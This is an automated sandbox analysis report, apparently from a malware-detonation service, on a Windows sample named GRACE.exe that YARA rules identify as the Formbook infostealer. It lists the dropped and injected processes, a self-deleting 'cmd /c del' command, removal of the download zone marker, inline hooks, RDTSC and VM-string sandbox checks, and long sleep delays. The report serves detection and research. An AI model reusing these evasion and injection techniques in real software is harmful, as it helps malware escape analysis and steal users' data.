Source: 0000000A.00000002.327302486.0000000000D80000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000011.00000002.621878003.0000000000D00000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000011.00000002.621878003.0000000000D00000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000011.00000002.623260769.0000000000E70000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000011.00000002.623260769.0000000000E70000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000002.327086258.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000002.327086258.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.295698106.0000000004302000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.295698106.0000000004302000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 10.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 10.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 10.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 10.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: classification engine | Classification label: mal100.troj.evad.winEXE@7/2@12/1
Source: C:\Users\user\Desktop\GRACE.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\GRACE.exe.log
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7040:120:WilError_01
Source: C:\Users\user\Desktop\GRACE.exe | File created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe
Source: GRACE.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\GRACE.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\Desktop\GRACE.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\GRACE.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\GRACE.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: GRACE.exe | Virustotal: Detection: 62%
Source: GRACE.exe | Metadefender: Detection: 16%
Source: GRACE.exe | ReversingLabs: Detection: 43%
Source: unknown | Process created: C:\Users\user\Desktop\GRACE.exe 'C:\Users\user\Desktop\GRACE.exe'
Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe C:\Users\user\AppData\Local\Temp\AddInProcess32.exe
Source: unknown | Process created: C:\Windows\SysWOW64\netsh.exe C:\Windows\SysWOW64\netsh.exe
Source: unknown | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\AddInProcess32.exe'
Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\GRACE.exe | Process created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe C:\Users\user\AppData\Local\Temp\AddInProcess32.exe
Source: C:\Windows\SysWOW64\netsh.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\AddInProcess32.exe'
Source: C:\Windows\explorer.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C3EE638-B588-4D7D-B30A-E7E36759305D}\InprocServer32
Source: C:\Users\user\Desktop\GRACE.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: GRACE.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: GRACE.exe | Static PE information: Virtual size of .text is bigger than: 0x100000
Source: GRACE.exe | Static file information: File size 3215360 > 1048576
Source: GRACE.exe | Static PE information: Raw size of .text is bigger than: 0x100000 < 0x310400
Source: GRACE.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
          Source: Binary string: AddInProcess32.pdb source: GRACE.exe, 00000000.00000002.297040723.0000000008800000.00000004.00000001.sdmp, AddInProcess32.exe, netsh.exe, 00000011.00000002.630581180.0000000003BFF000.00000004.00000001.sdmp, AddInProcess32.exe.0.dr
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000010.00000000.315609957.000000000E1C0000.00000002.00000001.sdmp
          Source: Binary string: netsh.pdb source: AddInProcess32.exe, 0000000A.00000002.328311598.0000000001640000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: AddInProcess32.exe, 0000000A.00000002.327825504.0000000001310000.00000040.00000001.sdmp, netsh.exe, 00000011.00000002.627626275.00000000037EF000.00000040.00000001.sdmp
          Source: Binary string: netsh.pdbGCTL source: AddInProcess32.exe, 0000000A.00000002.328311598.0000000001640000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: AddInProcess32.exe, netsh.exe
          Source: Binary string: AddInProcess32.pdbpw source: GRACE.exe, 00000000.00000002.297040723.0000000008800000.00000004.00000001.sdmp, AddInProcess32.exe, 0000000A.00000000.284703831.00000000008E2000.00000002.00020000.sdmp, netsh.exe, 00000011.00000002.630581180.0000000003BFF000.00000004.00000001.sdmp, AddInProcess32.exe.0.dr
          Source: Binary string: wscui.pdb source: explorer.exe, 00000010.00000000.315609957.000000000E1C0000.00000002.00000001.sdmp
Source: C:\Users\user\Desktop\GRACE.exe | Code function: 0_2_004F050E push es; retf
Source: C:\Users\user\Desktop\GRACE.exe | Code function: 0_2_004F04A6 push es; retf
Source: C:\Users\user\Desktop\GRACE.exe | Code function: 0_2_026388F0 pushfd ; retf
Source: C:\Users\user\Desktop\GRACE.exe | Code function: 0_2_026FC54A pushfd ; ret
Source: C:\Users\user\Desktop\GRACE.exe | Code function: 0_2_026FC511 push FFFFFF8Bh; iretd
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 10_2_0041CEB5 push eax; ret
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 10_2_0041CF6C push eax; ret
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 10_2_0041CF02 push eax; ret
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 10_2_0041CF0B push eax; ret
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 10_2_0138D0D1 push ecx; ret
Source: C:\Windows\SysWOW64\netsh.exe | Code function: 17_2_0374D0D1 push ecx; ret
Source: C:\Windows\SysWOW64\netsh.exe | Code function: 17_2_00D1D856 push esi; ret
Source: C:\Windows\SysWOW64\netsh.exe | Code function: 17_2_00D1CEB5 push eax; ret
Source: C:\Windows\SysWOW64\netsh.exe | Code function: 17_2_00D1CF6C push eax; ret
Source: C:\Windows\SysWOW64\netsh.exe | Code function: 17_2_00D1CF02 push eax; ret
Source: C:\Windows\SysWOW64\netsh.exe | Code function: 17_2_00D1CF0B push eax; ret
Source: C:\Users\user\Desktop\GRACE.exe | File created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Users\user\Desktop\GRACE.exe | File opened: C:\Users\user\Desktop\GRACE.exe\:Zone.Identifier read attributes | delete
Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exe | User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8F 0xFE 0xE3
Source: C:\Users\user\Desktop\GRACE.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\GRACE.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\GRACE.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\GRACE.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\GRACE.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\GRACE.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\GRACE.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\GRACE.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\GRACE.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\GRACE.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\GRACE.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\GRACE.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\GRACE.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\GRACE.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\GRACE.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\GRACE.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\GRACE.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\GRACE.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\GRACE.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\GRACE.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\GRACE.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\GRACE.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\GRACE.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\GRACE.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\GRACE.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\GRACE.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\GRACE.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\GRACE.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\GRACE.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\GRACE.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\GRACE.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\GRACE.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\GRACE.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\GRACE.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\GRACE.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\GRACE.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\GRACE.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\GRACE.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\GRACE.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\GRACE.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\GRACE.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\GRACE.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\GRACE.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\GRACE.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\GRACE.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\GRACE.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\GRACE.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\GRACE.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\GRACE.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\GRACE.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\GRACE.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\GRACE.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\GRACE.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\GRACE.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\GRACE.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | RDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\netsh.exe | RDTSC instruction interceptor: First address: 0000000000D098E4 second address: 0000000000D098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\netsh.exe | RDTSC instruction interceptor: First address: 0000000000D09B5E second address: 0000000000D09B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 10_2_00409A90 rdtsc
Source: C:\Users\user\Desktop\GRACE.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\GRACE.exe | Window / User API: threadDelayed 685
Source: C:\Users\user\Desktop\GRACE.exe | Window / User API: threadDelayed 9173
Source: C:\Users\user\Desktop\GRACE.exe TID: 6852 | Thread sleep time: -9223372036854770s >= -30000s
Source: C:\Users\user\Desktop\GRACE.exe TID: 6852 | Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\Desktop\GRACE.exe TID: 6856 | Thread sleep count: 685 > 30
Source: C:\Users\user\Desktop\GRACE.exe TID: 6856 | Thread sleep count: 9173 > 30
Source: C:\Windows\explorer.exe TID: 1260 | Thread sleep time: -92000s >= -30000s
Source: C:\Windows\SysWOW64\netsh.exe TID: 3476 | Thread sleep time: -100000s >= -30000s
Source: C:\Windows\explorer.exe | Last function: Thread delayed
Source: GRACE.exe, 00000000.00000002.295354303.0000000003851000.00000004.00000001.sdmp | Binary or memory string: VMware
Source: explorer.exe, 00000010.00000000.310221378.000000000871F000.00000004.00000001.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: GRACE.exe, 00000000.00000002.295354303.0000000003851000.00000004.00000001.sdmp | Binary or memory string: vmware svga
Source: GRACE.exe, 00000000.00000002.296291104.0000000004F60000.00000002.00000001.sdmp, explorer.exe, 00000010.00000000.308811774.0000000008220000.00000002.00000001.sdmp | Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: GRACE.exe, 00000000.00000002.295354303.0000000003851000.00000004.00000001.sdmp | Binary or memory string: tpautoconnsvc#Microsoft Hyper-V
Source: GRACE.exe, 00000000.00000002.295354303.0000000003851000.00000004.00000001.sdmp | Binary or memory string: cmd.txtQEMUqemu
Source: GRACE.exe, 00000000.00000002.295354303.0000000003851000.00000004.00000001.sdmp | Binary or memory string: vmsrvc
Source: explorer.exe, 00000010.00000000.310221378.000000000871F000.00000004.00000001.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: GRACE.exe, 00000000.00000002.295354303.0000000003851000.00000004.00000001.sdmp | Binary or memory string: vmware sata5vmware usb pointing device-vmware vmci bus deviceCvmware virtual s scsi disk device
Source: explorer.exe, 00000010.00000000.305340019.0000000005603000.00000004.00000001.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
Source: GRACE.exe, 00000000.00000002.296291104.0000000004F60000.00000002.00000001.sdmp, explorer.exe, 00000010.00000000.308811774.0000000008220000.00000002.00000001.sdmp | Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: GRACE.exe, 00000000.00000002.295354303.0000000003851000.00000004.00000001.sdmp | Binary or memory string: virtual-vmware pointing device
Source: explorer.exe, 00000010.00000000.310221378.000000000871F000.00000004.00000001.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
Source: explorer.exe, 00000010.00000002.637677644.0000000004DF3000.00000004.00000001.sdmp | Binary or memory string: War&Prod_VMware_SATA_CD00#5&L
Source: explorer.exe, 00000010.00000000.309365521.0000000008640000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: GRACE.exe, 00000000.00000002.295354303.0000000003851000.00000004.00000001.sdmp | Binary or memory string: vmware
          Source: GRACE.exe, 00000000.00000002.295354303.0000000003851000.00000004.00000001.sdmpBinary or memory string: vmusrvc
          Source: explorer.exe, 00000010.00000002.638572944.00000000055D0000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}V*(E
          Source: explorer.exe, 00000010.00000000.310221378.000000000871F000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
          Source: GRACE.exe, 00000000.00000002.295354303.0000000003851000.00000004.00000001.sdmpBinary or memory string: vmtools
          Source: explorer.exe, 00000010.00000000.310539218.00000000087D1000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00ices
          Source: GRACE.exe, 00000000.00000002.295354303.0000000003851000.00000004.00000001.sdmpBinary or memory string: vboxservicevbox)Microsoft Virtual PC
          Source: explorer.exe, 00000010.00000002.638572944.00000000055D0000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAWw5%SystemRoot%\system32\mswsock.dllP1
          Source: GRACE.exe, 00000000.00000002.296291104.0000000004F60000.00000002.00000001.sdmp, explorer.exe, 00000010.00000000.308811774.0000000008220000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: GRACE.exe, 00000000.00000002.296291104.0000000004F60000.00000002.00000001.sdmp, explorer.exe, 00000010.00000000.308811774.0000000008220000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\GRACE.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\netsh.exeProcess queried: DebugPort
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_00409A90 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0040ACD0 LdrLoadDll,
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 10_2_0136513A mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 10_2_01354120 mov eax, dword ptr fs:[00000030h] (4 occurrences)
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 10_2_01354120 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 10_2_01339100 mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 10_2_0133B171 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 10_2_0133C962 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 10_2_0135B944 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 10_2_013B51BE mov eax, dword ptr fs:[00000030h] (4 occurrences)
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 10_2_013599BF mov ecx, dword ptr fs:[00000030h] (8 occurrences)
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 10_2_013599BF mov eax, dword ptr fs:[00000030h] (4 occurrences)
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 10_2_013661A0 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 10_2_013F49A4 mov eax, dword ptr fs:[00000030h] (4 occurrences)
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 10_2_013B69A6 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 10_2_01362990 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 10_2_0136A185 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 10_2_0135C182 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 10_2_0133B1E1 mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 10_2_013C41E8 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 10_2_0135A830 mov eax, dword ptr fs:[00000030h] (4 occurrences)
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 10_2_0136002D mov eax, dword ptr fs:[00000030h] (5 occurrences)
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 10_2_0134B02A mov eax, dword ptr fs:[00000030h] (4 occurrences)
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 10_2_013B7016 mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 10_2_01401074 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 10_2_013F2073 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 10_2_01404015 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 10_2_01350050 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 10_2_0136F0BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 10_2_0136F0BF mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 10_2_013620A0 mov eax, dword ptr fs:[00000030h] (6 occurrences)
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 10_2_013790AF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 10_2_01339080 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 10_2_013B3884 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 10_2_0135B8E4 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 10_2_013340E1 mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 10_2_013358EC mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 10_2_013CB8D0 mov eax, dword ptr fs:[00000030h] (5 occurrences)
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 10_2_013CB8D0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 10_2_01408B58 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 10_2_013F131B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 10_2_0135A309 mov eax, dword ptr fs:[00000030h] (21 occurrences)
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 10_2_01363B7A mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 10_2_0133DB60 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 10_2_0133F358 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 10_2_0133DB40 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 10_2_01364BAD mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 10_2_01362397 mov eax, dword ptr fs:[00000030h]
